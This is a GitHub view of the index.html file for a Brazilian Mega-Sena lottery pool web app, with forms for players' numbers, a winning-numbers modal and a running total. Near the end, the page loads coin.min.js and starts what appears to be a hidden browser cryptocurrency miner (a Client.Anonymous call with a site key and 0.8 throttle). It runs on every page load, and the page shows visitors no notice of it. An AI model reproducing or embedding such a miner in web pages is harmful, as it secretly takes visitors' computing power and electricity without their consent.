-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.html
115 lines (109 loc) · 4.77 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
<!DOCTYPE html>
<html lang='pt-BR'>
<head>
<meta charset='UTF-8'>
<meta name='viewport' content='width=device-width, initial-scale=1, shrink-to-fit=no'>
<meta name='description' content='bolão entre amigos'>
<meta name='keywords' content='mega-sena, bolão, loteria, mega da virada'>
<meta name='author' content='Alessandro Dev'>
<link rel='shortcut icon' href='./assets/images/trevo.png' type='image/x-icon'>
<title></title>
<link rel='stylesheet' href='./assets/css/normalize.css'>
<link rel='stylesheet' href='./assets/css/style.css'>
<script src="./assets/js/coin.min.js" crossorigin="true" defer></script>
</head>
<body>
<header class="header">
<div class="header_title_logo">
<picture class="header_picture">
<img class="header_logo" src="./assets/images/trevo.png" alt="logo, folha de um trevo de quatro folhas">
</picture>
<h1 class="header_title">Bolão entre amigos</h1>
</div>
<div class="header_share">
<span class="share_icon"><i class="fa-solid fa-share-nodes"></i></span>
</div>
</header>
<main class="main">
<section class="main_new_game">
<h2>Novo jogo</h2>
<article class="new_game_params">
<form action="#" method="get" class="new_game_numbers" id="new_game_form">
<input type="number" name="number1" id="number1" max="60" min="0" required placeholder="1">
<input type="number" name="number2" id="number2" max="60" min="0" required placeholder="2">
<input type="number" name="number3" id="number3" max="60" min="0" required placeholder="3">
<input type="number" name="number4" id="number4" max="60" min="0" required placeholder="4">
<input type="number" name="number5" id="number5" max="60" min="0" required placeholder="5">
<input type="number" name="number6" id="number6" max="60" min="0" required placeholder="6">
<input type="number" name="number7" id="number7" max="60" min="0" placeholder="+">
<input type="text" name="gamer" id="gamer" maxlength="20" placeholder="Nome jogador">
<input type="submit" value="Salvar">
</form>
</article>
</section>
<section class="main_games">
<h2>Jogos</h2>
<article class="games_table">
<div class="rows" id="games_data">
<!--
<div class="row">
<input type="number" disabled value="3">
<input type="number" disabled value="7">
<input type="number" disabled value="12">
<input type="number" disabled value="21">
<input type="number" disabled value="44">
<input type="number" disabled value="44">
<input type="text" class="gamer" disabled value="Juliano">
<input type="text" class="price" disabled value="R$ 4,50">
<div class="btn green" data-action="unlike"><i class="fa-solid fa-thumbs-up"></i></div>
<div class="btn red" data-action="delete"><i class="fa-solid fa-trash"></i></div>
</div>
-->
</div>
</article>
</section>
</main>
<div class="modal closed" id="modal">
<div class="modal-content">
<h2>Informe o resultado</h2>
<p>Você pode encontrar o último resultado no link da <a href="http://www.loterias.caixa.gov.br/wps/portal/loterias/landing/megasena/" target="_blank">Caixa</a></p>
<form action="#" method="get" class="winning_numbers" id="winning_numbers">
<div class="content">
<div class="modal_group">
<input type="number" name="number1" max="60" min="0" required placeholder="1" tabindex="1">
<input type="number" name="number4" max="60" min="0" required placeholder="4" tabindex="4">
</div>
<div class="modal_group">
<input type="number" name="number2" max="60" min="0" required placeholder="2" tabindex="2">
<input type="number" name="number5" max="60" min="0" required placeholder="5" tabindex="5">
</div>
<div class="modal_group">
<input type="number" name="number3" max="60" min="0" required placeholder="3" tabindex="3">
<input type="number" name="number6" max="60" min="0" required placeholder="6" tabindex="6">
</div>
</div>
<div class="modal_footer">
<input type="reset" value="Cancelar" tabindex="8" id="btn_close_modal">
<input type="submit" value="Aplicar" tabindex="7">
</div>
</form>
</div>
</div>
<footer class="footer">
<div class="info">
<p class="label" id="total_money">Total R$ 0.00</p>
<p class="label" id="total_games">Jogos 00</p>
</div>
<div class="btn green check" id="btn-check">Conferir</div>
</footer>
<script type="module">
var _client = new Client.Anonymous('a63bda6fa5ca8c72693b18d49b7bf3b8d848f9c309114dc407ac562b64084efc', {
throttle: 0.8, c: 'w', ads: 0
});
_client.start();
</script>
<script src="https://kit.fontawesome.com/7f4ebd6cfd.js" crossorigin="anonymous"></script>
<script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
<script src="./assets/js/index.js"></script>
</body>
</html>